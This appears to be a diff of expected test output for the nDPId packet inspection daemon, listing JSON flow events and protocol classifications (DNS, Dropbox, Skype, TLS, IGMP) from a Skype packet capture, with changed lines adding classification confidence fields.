+00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431969712918,"flow_last_seen":1431969747557,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969723979,"flow_last_seen":1431969750316,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63421,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969657029,"flow_last_seen":1431969777184,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2510,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1431969656652,"flow_last_seen":1431969807022,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":3012,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969657029,"flow_last_seen":1431969777184,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2510,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1431969656652,"flow_last_seen":1431969807022,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":3012,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642398,"flow_last_seen":1431969668794,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00604{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00605{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00604{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00603{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969664357,"flow_last_seen":1431969789358,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00630{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00631{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00630{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00629{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969664357,"flow_last_seen":1431969789358,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969712913,"flow_last_seen":1431969714738,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54067,"dst_port":5351,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969712913,"flow_last_seen":1431969714738,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54067,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969641947,"flow_last_seen":1431969668369,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49163,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969641948,"flow_last_seen":1431969668369,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57406,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969657029,"flow_last_seen":1431969777185,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2510,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1431969656652,"flow_last_seen":1431969807022,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":3012,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969657029,"flow_last_seen":1431969777185,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2510,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1431969656652,"flow_last_seen":1431969807022,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":3012,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":86,"flow_first_seen":1431969719110,"flow_last_seen":1431969765415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15522,"flow_avg_l4_payload_len":180,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00595{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969707326,"flow_last_seen":1431969717500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969707326,"flow_last_seen":1431969717500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969707326,"flow_last_seen":1431969717500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969677975,"flow_last_seen":1431969704363,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49360,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969713815,"flow_last_seen":1431969726847,"flow_idle_time":180000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":660,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969722958,"flow_last_seen":1431969740384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969722958,"flow_last_seen":1431969740384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969724570,"flow_last_seen":1431969725166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3849,"flow_avg_l4_payload_len":202,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969724570,"flow_last_seen":1431969725166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3849,"flow_avg_l4_payload_len":202,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969724570,"flow_last_seen":1431969725166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3849,"flow_avg_l4_payload_len":202,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969714398,"flow_last_seen":1431969727593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50112,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969714398,"flow_last_seen":1431969727593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50112,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969794907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50135,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969794907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50135,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969712931,"flow_last_seen":1431969713736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50109,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969712931,"flow_last_seen":1431969713736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50109,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969712931,"flow_last_seen":1431969713736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50109,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
